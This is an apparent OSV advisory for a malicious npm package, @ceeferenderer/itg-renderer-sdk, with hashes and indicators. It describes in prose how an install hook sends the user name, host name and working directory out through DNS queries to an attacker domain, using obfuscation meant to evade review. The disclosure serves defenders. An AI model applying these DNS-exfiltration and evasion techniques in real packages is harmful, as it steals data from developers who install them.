MAL-2026-2407
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@ceeferenderer/itg-renderer-sdk/MAL-2026-2407.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-2407
- Published
- 2026-03-24T09:03:48Z
- Modified
- 2026-05-13T20:22:21.285475Z
- Summary
- Malicious code in @ceeferenderer/itg-renderer-sdk (npm)
- Details
-
Malicious package due to code obfuscation, dynamic module loading, process exposure, suspicious install script, and untrustworthy author email.
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (51b9fa22264e38705c3a7ba319515ee66036e72ab14c32d08b01a5695aa191b8)
This package performs silent reconnaissance against any machine that installs or requires it. The package.json declares
scripts.install = node index.js, and index.js also loads lib/core.js at require() time. lib/core.js obtains theosanddnsmodules viamodule.constructor._load(...)— a deliberate bypass of simplerequire('os')/require('dns')source grep — then readsos.userInfo().username,os.hostname(), andpath.basename(process.cwd()), concatenates them with a timestamp and the hard-coded domainoob.sl4x0.xyz, and callsdns.resolve4()on the resulting subdomain. Becauseoob.sl4x0.xyzis an attacker-controlled authoritative nameserver, the victim's resolver leaks the username, hostname, and working-directory name as DNS query labels. The sensitive identifiers and the domain itself are stored as hex byte arrays in lib/6ad264.js and lib/b02e30.js and reassembled at runtime viaString.fromCharCode, and the JS filenames are random hex — clear evasion of static review. Supporting red flags: the author email isresearch@sl4x0.xyz(same attacker-owned domain), the version is99.9.9, and the package description is generic. This is active exfiltration of installer-side data executed on both install and import, with no legitimate functionality documented. - Database specific
{ "malicious-packages-origins": [ { "modified_time": "2026-04-07T14:24:50Z", "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ], "sha256": "6f323b1bbcb702f6ba95647783f3bb722e75b2c8324aadb6e42f0580529591b0", "source": "amazon-inspector", "import_time": "2026-04-07T14:39:15.165559355Z" }, { "modified_time": "2026-05-12T19:03:07Z", "versions": [ "99.9.9" ], "sha256": "51b9fa22264e38705c3a7ba319515ee66036e72ab14c32d08b01a5695aa191b8", "id": "IN-MAL-2026-002362", "source": "amazon-inspector", "import_time": "2026-05-13T20:10:56.299458224Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- SafeDep - FINDER
-
Affected packages
npm / @ceeferenderer/itg-renderer-sdk
Package
- Name
- @ceeferenderer/itg-renderer-sdk
- View open source insights on deps.dev
- Purl
- pkg:npm/%40ceeferenderer/itg-renderer-sdk
Affected ranges
- Type
- SEMVER
- Events
-
Introduced0Unknown introduced version / All previous versions are affected
Database specific
indicators
{
"evidence_files": [
{
"sha256": "d24415d02b2768deed6613ba41e3837825889459718a582d352a0805d40a321c",
"tlsh": "d0f02d69b393c48f97e096d0360a53d18559c3c0e7cf8195fb7c4a87904e7d1ca85a55",
"path": "lib/core.js"
},
{
"sha256": "f7942b52b33a05f44ce43c1cc581fa1140cbbef03acdba961ade9f4a44cb03e1",
"tlsh": "73f0595166a3d19f77d69ac35f4190a0acb60a40b60ed0d5fa2c1bde00eeb13e9c54b0",
"path": "lib/6ad264.js"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-cfO0fgspdySVZZXUeDwtKXdHnDhxuHyPLZkZ3N5lKo6AiZ1uhWp9iTjz3AFp0RIwn4GT6R4PoqhmdN7rKvnRIQ==",
"sha1": "ad55d8db474615959fda9274cf3b72a4cce0c7b9"
},
"filename": "itg-renderer-sdk-99.9.9.tgz"
}
]
}
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@ceeferenderer/itg-renderer-sdk/MAL-2026-2407.json"